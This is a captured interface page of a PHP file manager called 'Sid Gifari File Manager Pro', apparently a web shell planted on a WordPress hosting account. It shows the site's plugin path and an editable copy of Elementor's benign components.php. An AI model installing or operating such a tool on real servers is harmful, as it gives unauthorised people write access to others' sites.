🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-16 10:35:34 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
public_html
/
wp-content
/
plugins
/
elementor
/
modules
/
components
📍 /home/therahul/public_html/wp-content/plugins/elementor/modules/components
🔄 Refresh
✏️
Editing: components.php
Writable
<?php namespace Elementor\Modules\Components; use Elementor\Core\Utils\Collection; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Components { private Collection $components; public static function make( array $components = [] ) { return new static( $components ); } private function __construct( array $components = [] ) { $this->components = Collection::make( $components ); } public function get_components() { return $this->components; } }
💾 Save Changes
❌ Cancel